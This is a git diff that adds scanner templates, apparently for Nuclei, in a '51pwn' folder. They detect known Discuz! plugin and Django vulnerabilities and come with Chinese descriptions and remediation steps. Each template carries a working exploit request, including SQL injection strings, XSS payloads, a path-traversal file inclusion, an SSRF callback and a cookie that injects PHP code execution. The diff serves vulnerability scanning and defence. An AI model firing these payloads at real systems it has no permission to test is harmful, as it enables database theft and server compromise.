3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'c4ca4238a0b923820dcc509a6f75849b') + path: + - '{{BaseURL}}/forummission.php?index=show&id=24%20and+1=2+union+select+1,2,md5(1),4,5,6,7,8,9,10,11--' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git a/config/51pwn/yaml/Discuz!/Discuz-sqli-nds_ques_viewanswe.yaml b/config/51pwn/yaml/Discuz!/Discuz-sqli-nds_ques_viewanswe.yaml new file mode 100755 index 000000000..87649dca5 --- /dev/null +++ b/config/51pwn/yaml/Discuz!/Discuz-sqli-nds_ques_viewanswe.yaml @@ -0,0 +1,38 @@ +id: Discuz-sqli-nds_ques_viewanswe +info: + name: Discuz nds_ques_viewanswer插件 SQL注入漏洞检测 + author: + - 折跃 + description: |- + Discuz! nds_ques_viewanswer插件SQL注入漏洞 + Discuz!是一套通用的社区论坛软件系统。 + + Discuz! nds_ques_viewanswer插件存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://discuz.net/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'c4ca4238a0b923820dcc509a6f75849') + path: + - '{{BaseURL}}/plugin.php?id=nds_up_ques:nds_ques_viewanswer&srchtxt=1&orderby=dateline%20and%201=(updatexml(1,concat(0x27,MD5(1)),1))--' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git a/config/51pwn/yaml/Discuz!/Discuz-sqli-v63shop_goods.yaml b/config/51pwn/yaml/Discuz!/Discuz-sqli-v63shop_goods.yaml new file mode 100755 index 000000000..73b8d0cb9 --- /dev/null +++ b/config/51pwn/yaml/Discuz!/Discuz-sqli-v63shop_goods.yaml @@ -0,0 +1,43 @@ +id: Discuz-sqli-v63shop_goods +info: + name: Discuz v63shop_goods插件 SQL注入漏洞 + author: + - 折跃 + description: |- + Discuz! v63shop_goods插件SQL注入漏洞 + Discuz!是一套通用的社区论坛软件系统。 + + Discuz! v63shop_goods插件存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://discuz.net/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'4beed3b9c4a886067de0e3a094246f78') + path: + - '{{BaseURL}}/plugin.php?id=v63shop:goods&pac=info&gid=1 and 1=2 union /*!50000select*/ + 1,2,3,4,5,6,md5(3.14),8,9,10,11,12,13,14' + - '{{BaseURL}}/plugin.php?id=v63shop:goods&pac=info&gid=`''` or @`''''` union select + 1 from (select count(*),concat((select md5(3.14)),floor(rand(0)*2))a from information_schema.tables + group by a)b where @`''`' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true + stop-at-first-match: true diff --git a/config/51pwn/yaml/Discuz!/Discuz-unauthorized-tools.yaml b/config/51pwn/yaml/Discuz!/Discuz-unauthorized-tools.yaml new file mode 100755 index 000000000..9adedba36 --- /dev/null +++ b/config/51pwn/yaml/Discuz!/Discuz-unauthorized-tools.yaml @@ -0,0 +1,36 @@ +id: Discuz-unauthorized-tools +info: + name: Discuz!_X3急救箱未授权访问漏洞 + author: + - 折跃 + description: |- + Discuz! X3 tools.php未授权访问漏洞 + Discuz!是一套通用的社区论坛软件系统。 + + Discuz! X3急救箱tools.php存在未授权漏洞。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://discuz.net/ + + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 + 3、关闭急救箱页面 + 4、修改急救箱默认密码为强口令 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'?action=setadmin') + - contains(body,'tools.php?action=login') + - contains(body,'toolpassword') + path: + - '{{BaseURL}}/source/plugin/tools/tools.php' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git a/config/51pwn/yaml/Discuz!/Discuz-xss-admin.yaml b/config/51pwn/yaml/Discuz!/Discuz-xss-admin.yaml new file mode 100755 index 000000000..838ff5ca6 --- /dev/null +++ b/config/51pwn/yaml/Discuz!/Discuz-xss-admin.yaml @@ -0,0 +1,31 @@ +id: Discuz-xss-admin +info: + name: Discuz_x 1.5_XSS跨站脚本攻击 + author: + - 折跃 + description: |- + Discuz! admin.php 跨站脚本漏洞 + Discuz!是一套通用的社区论坛软件系统。 + + Discuz! /uc_server/admin.php文件存在跨站脚本漏洞,该漏洞源于程序没有正确的过滤用户提交的输入。远程攻击者可利用该漏洞在用户浏览器中执行任意脚本代码。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://discuz.net/ + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'') + path: + - '{{BaseURL}}/uc_server/admin.php?m=user&a=login&iframe=&sid=%27%22%3E%3Cscript%3Ealert(/asdfa/)%3C/script%3E' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git a/config/51pwn/yaml/Discuz!/Discuz-xss-admincp.yaml b/config/51pwn/yaml/Discuz!/Discuz-xss-admincp.yaml new file mode 100755 index 000000000..be43f9c17 --- /dev/null +++ b/config/51pwn/yaml/Discuz!/Discuz-xss-admincp.yaml @@ -0,0 +1,31 @@ +id: Discuz-xss-admincp +info: + name: Discuz! 7.2 admincp.php XSS漏洞 + author: + - 折跃 + description: |- + Discuz! 7.2 admincp.php 反射型跨站脚本漏洞 + Discuz!是一套通用的社区论坛软件系统。 + + Discuz! 7.2 中的admincp.php文件存在跨站脚本漏洞,该漏洞源于程序没有正确的过滤用户提交的输入。远程攻击者可利用该漏洞在用户浏览器中执行任意脚本代码。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://discuz.net/ + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"alert(/testvul/)") + path: + - '{{BaseURL}}/admincp.php?infloat=yes&handlekey=123);alert(/testvul/);//' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git a/config/51pwn/yaml/Discuz!/Discuz-xss-ajax.yaml b/config/51pwn/yaml/Discuz!/Discuz-xss-ajax.yaml new file mode 100755 index 000000000..09e8ba24f --- /dev/null +++ b/config/51pwn/yaml/Discuz!/Discuz-xss-ajax.yaml @@ -0,0 +1,31 @@ +id: Discuz-xss-ajax +info: + name: Discuz!_7.X_ajax.php_反射型XSS + author: + - 折跃 + description: |- + Discuz! 7.X ajax.php 跨站脚本漏洞 + Discuz!是一套通用的社区论坛软件系统。 + + Discuz! 7.X 中的ajax.php文件存在跨站脚本漏洞,该漏洞源于程序没有正确的过滤用户提交的输入。远程攻击者可利用该漏洞在用户浏览器中执行任意脚本代码。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://discuz.net/ + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'alert(/xss/);//') + path: + - '{{BaseURL}}/ajax.php?infloat=yes&handlekey=123);alert(/xss/);//' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git a/config/51pwn/yaml/Discuz!/Discuz_x3_2-sqlimisc.yaml b/config/51pwn/yaml/Discuz!/Discuz_x3_2-sqlimisc.yaml new file mode 100755 index 000000000..f696242f6 --- /dev/null +++ b/config/51pwn/yaml/Discuz!/Discuz_x3_2-sqlimisc.yaml @@ -0,0 +1,38 @@ +id: Discuz_x3_2-sqlimisc +info: + name: Discuz x3.2 misc.php SQL注入漏洞 + author: + - 折跃 + description: |- + Discuz! misc.php SQL注入漏洞 + Discuz!是一套通用的社区论坛软件系统。 + + Discuz! misc.php存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://discuz.net/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'827ccb0eea8a706c4c34a16891f84e7b1') + path: + - '{{BaseURL}}/misc.php?mod=stat&op=trend&xml=1&merge=1&types[1]=password`as%20statistic%20(select%20(select%20md5(12345)%20from%20pre_common_statuser,pre_ucenter_members%20as' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git a/config/51pwn/yaml/Discuz!/Wooyun-2010-080723.yaml b/config/51pwn/yaml/Discuz!/Wooyun-2010-080723.yaml new file mode 100755 index 000000000..711f8b456 --- /dev/null +++ b/config/51pwn/yaml/Discuz!/Wooyun-2010-080723.yaml @@ -0,0 +1,34 @@ +id: Wooyun-2010-080723 +info: + name: Discuz 7.x/6.x 全局变量防御绕过导致代码执行 + author: + - l0ne1y + description: |- + Discuz! 6.x/7.x 全局变量防御绕过导致代码执行漏洞 + Discuz!一套通用的社区论坛软件系统。 + + 越权漏洞包括水平越权、垂直越权和未授权访问。在Web程序中由于权限控制不当,导致用户可以访问或操作到本身没有权限访问的数据即使越权访问。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://discuz.net/ + + 临时修复方案: + 1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 + 2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: word + part: body + words: + - '{{randstr}}' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/viewthread.php?tid=10' + method: GET + headers: + Cookie: GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Bsearcharray%5D=/.*/eui; GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Breplacearray%5D=print_r({{randstr}})); diff --git a/config/51pwn/yaml/Discuz!/discuz-info-admincp.yaml b/config/51pwn/yaml/Discuz!/discuz-info-admincp.yaml new file mode 100755 index 000000000..6d71f0cab --- /dev/null +++ b/config/51pwn/yaml/Discuz!/discuz-info-admincp.yaml @@ -0,0 +1,32 @@ +id: discuz-info-admincp +info: + name: discuz7.2 网站路径泄露漏洞 + author: + - 折跃 + description: |- + Discuz! 7.2 物理路径泄露漏洞 + Discuz!是一套通用的社区论坛软件系统。 + + Discuz! 7.2存在物理路径泄露漏洞。 + severity: low + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://discuz.net/ + + 临时修复方案: + 1、屏蔽报错信息输出 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'/manyou/admincp.php') + - '!contains(body,''/manyou/admincp.php?my_suffix=%0A%0DTOBY57'')' + path: + - '{{BaseURL}}/manyou/admincp.php?my_suffix=%0A%0DTOBY57' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git a/config/51pwn/yaml/Discuz!/discuz-info-config_ucenter.yaml b/config/51pwn/yaml/Discuz!/discuz-info-config_ucenter.yaml new file mode 100755 index 000000000..35a939097 --- /dev/null +++ b/config/51pwn/yaml/Discuz!/discuz-info-config_ucenter.yaml @@ -0,0 +1,34 @@ +id: discuz-info-config_ucenter +info: + name: discuz config_ucenter.php 文件备份漏洞 + author: + - 折跃 + description: |- + Discuz! 备份文件泄露漏洞 + Discuz!是一套通用的社区论坛软件系统。 + + Discuz!存在备份文件泄露漏洞,攻击者可通过下载备份文件获取系统敏感信息。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://discuz.net/ + + 临时修复方案: + 1、去除页面中涉及的敏感信息或删除泄露信息的页面。 + 2、将敏感信息进行加密存储,非必要不可发送前端。 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理。 + 4、禁止外部用户访问.bak等后缀文件 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'c4ca4238a0b923820dcc509a6f75849') + raw: + - | + POST /upload/my.php?item=buddylist&descriptionnew[%27%20and(select%201%20from(select%20count(*),concat((select(select%20concat(0x7c,md5(1),0x7c,md5(1),0x7c)%20from%20cdb_members%20limit%200,1)%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23]=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + formhash=698a7245&buddysubmit=%2525E6%25258F%252590%25252B%2525C2%2525A0%25252B%2525E4%2525BA%2525A4 + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git a/config/51pwn/yaml/Discuz!/discuz-sqli-nds_up_ques.yaml b/config/51pwn/yaml/Discuz!/discuz-sqli-nds_up_ques.yaml new file mode 100755 index 000000000..f24252644 --- /dev/null +++ b/config/51pwn/yaml/Discuz!/discuz-sqli-nds_up_ques.yaml @@ -0,0 +1,40 @@ +id: discuz-sqli-nds_up_ques +info: + name: discuz调查问卷专业版插件3.269 sql注入漏洞 + author: + - 折跃 + description: |- + Discuz! 调查问卷专业版插件3.269 SQL注入漏洞 + Discuz!是一套通用的社区论坛软件系统。 + + Discuz! 调查问卷专业版插件3.269存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://discuz.net/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'c4ca4238a0b923820dcc509a6f75849') + path: + - '{{BaseURL}}/upload/plugin.php?id=nds_up_ques:nds_ques_viewanswer&srchtxt=1&orderby=dateline%20and%201=(updatexml(1,concat(0x27,md5(1)),1))--' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git a/config/51pwn/yaml/Discuz!/discuz-sqli-shop.yaml b/config/51pwn/yaml/Discuz!/discuz-sqli-shop.yaml new file mode 100755 index 000000000..756f6bf7f --- /dev/null +++ b/config/51pwn/yaml/Discuz!/discuz-sqli-shop.yaml @@ -0,0 +1,41 @@ +id: discuz-sqli-shop +info: + name: discuz UCenter Home 2.0 shop.php SQL注入漏洞 + author: + - 折跃 + description: |- + Discuz! UCenter Home 2.0 shop.php SQL注入漏洞 + Discuz!是一套通用的社区论坛软件系统。 + + Discuz! UCenter Home 2.0 shop.php存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://discuz.net/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'63e1f04640e83605c1d177544a5a0488') + path: + - '{{BaseURL}}/shop.php?ac=view&shopid=1 and(select 1 from(select count(*),concat((select + (select concat(0x7e,0x27,unhex(hex(md5(3.1415))),0x27,0x7e)) from information_schema.tables + limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and + 1=1' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git a/config/51pwn/yaml/Discuz!/discuz-ssrf-forum.yaml b/config/51pwn/yaml/Discuz!/discuz-ssrf-forum.yaml new file mode 100755 index 000000000..0cd59bdf5 --- /dev/null +++ b/config/51pwn/yaml/Discuz!/discuz-ssrf-forum.yaml @@ -0,0 +1,41 @@ +id: discuz-ssrf-forum +info: + name: discuz 3.x forum.php ssrf漏洞 + author: + - 折跃 + description: |- + Discuz! 3.x forum.php 服务器端请求伪造(SSRF)漏洞 + Discuz!是一套通用的社区论坛软件系统。 + + Discuz! 3.x 中的forum.php文件存在服务器端请求伪造漏洞。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://discuz.net/ + + 临时修复方案: + 1、过滤内网服务器对公网服务器请求的响应。如果Web应用是获取某一类型的文件,在把返回结果展示给用户之前应先验证返回的信息是否符合文件类型标准,比如返回信息应为图片,如果返回信息是HTML,则停止将返回信息返回客户端。 + 2、统一错误提示信息,避免用户可以根据错误信息来判断远端服务器的端口状态。 + 3、在内网服务器的防火墙上限制公网服务器的请求端口为HTTP等协议常用端口,如:80、443、8080、8090。 + 4、若公网服务器的内网IP与内网无业务通信,建议将公网服务器对应的内网IP列入黑名单,避免应用被用来获取内网数据。 + 5、内网服务器禁用不必要的协议,仅允许HTTP和HTTPS请求,防止类似于file:///、gopher://、ftp:// 等协议引起的安全问题。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - duration < 1 + - type: word + part: interactsh_protocol + words: + - dns + matchers-condition: and + path: + - '{{BaseURL}}/forum.php?mod=ajax&action=downremoteimg&message=[img]http://{{interactsh-url}}/?1.jpg + [/img]' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git a/config/51pwn/yaml/Discuz!/wooyun-2015-0131386.yaml b/config/51pwn/yaml/Discuz!/wooyun-2015-0131386.yaml new file mode 100755 index 000000000..aac3d24ee --- /dev/null +++ b/config/51pwn/yaml/Discuz!/wooyun-2015-0131386.yaml @@ -0,0 +1,36 @@ +id: wooyun-2015-0131386 +info: + name: Discuz dc_mall插件 本地文件包含漏洞 + author: + - 折跃 + description: |- + Discuz! dc_mall插件本地文件包含漏洞 + Discuz!是一套通用的社区论坛软件系统。 + + Discuz!的dc_mall插件存在本地文件包含漏洞,攻击者可利用该漏洞访问受限目录之外的位置进行文件包含攻击,以导致包含本地文件时执行代码。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://discuz.net/ + + 临时修复方案: + 1、PHP 中使用 open_basedir 配置限制访问在指定的区域,路径长短截断 + 2、过滤.(点)/(反斜杠)\(反斜杠),编码绕过 + 3、禁止服务器远程文件包含 + 4、对于限制了包含文件后缀的情况,需禁止%00截断(PHP更新到最新版本)。PHP版本小于5.3,php.ini magic_quotes_gpc = off,对可控参数未使用addslashes函数,满足这三个条件就可以使用%00截断。 + 5、问号、井号、空格绕过(远程) +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'User-agent') + - contains(body,'Disallow') + path: + - '{{BaseURL}}/plugin.php?id=dc_mall&action=../../../../../robots.txt%00' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git a/config/51pwn/yaml/Django/CVE-2017-12794.yaml b/config/51pwn/yaml/Django/CVE-2017-12794.yaml new file mode 100755 index 000000000..c6bd6672b --- /dev/null +++ b/config/51pwn/yaml/Django/CVE-2017-12794.yaml @@ -0,0 +1,35 @@ +id: CVE-2017-12794 +info: + name: Django Debug Page - Cross-Site Scripting + author: + - l0ne1y + description: |- + Django 跨站脚本漏洞 + Django是Django软件基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。 + + Django 1.10.8之前的版本和1.11.5之前的1.11.x版本中的Technical 500 Template存在安全漏洞,该漏洞源于程序没有正确的过滤用户提交的输入。远程攻击者可利用该漏洞在浏览器中执行任意脚本代码。 + severity: medium + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://www.djangoproject.com/weblog/2017/sep/05/security-releases/ + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + part: body + words: + - + - type: status + status: + - 200 + - type: word + part: header + words: + - text/html + matchers-condition: and + path: + - '{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E' + method: GET diff --git a/config/51pwn/yaml/Django/CVE-2018-14574.yaml b/config/51pwn/yaml/Django/CVE-2018-14574.yaml new file mode 100755 index 000000000..2ee2ae2da --- /dev/null +++ b/config/51pwn/yaml/Django/CVE-2018-14574.yaml @@ -0,0 +1,34 @@ +id: CVE-2018-14574 +info: + name: Django Open Redirect + author: + - l0ne1y + description: |- + Django URL重定向漏洞 + Django是Django软件基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。 + + Django 1.11.15之前的1.11.x版本和2.0.8之前的2.0.x版本中的django.middleware.common.CommonMiddleware存在开放重定向漏洞。攻击者可利用该漏洞将用户重定向到任意网站。 + severity: medium + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://www.djangoproject.com/weblog/2018/aug/01/security-releases/ + + 临时修复方案: + 1、代码固定跳转地址,不让用户控制变量。 + 2、跳转目标地址采用白名单映射机制、只对合法的 URL 做跳转。 + 3、合理充分的校验校验跳转的目标地址,非己方地址时告知用户跳转风险。 +requests: +- matchers: + - type: status + status: + - 301 + - type: word + part: header + words: + - 'Location: https://www.bing.com' + - 'Location: http://www.bing.com' + matchers-condition: and + path: + - '{{BaseURL}}//www.bing.com' + method: GET diff --git a/config/51pwn/yaml/Django/CVE-2020-9402.yaml b/config/51pwn/yaml/Django/CVE-2020-9402.yaml new file mode 100755 index 000000000..75314ce56 --- /dev/null +++ b/config/51pwn/yaml/Django/CVE-2020-9402.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-9402 +info: + name: Django SQL Injection + author: + - l0ne1y + description: |- + Django SQL注入漏洞 + Django是Django基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。 + + Django 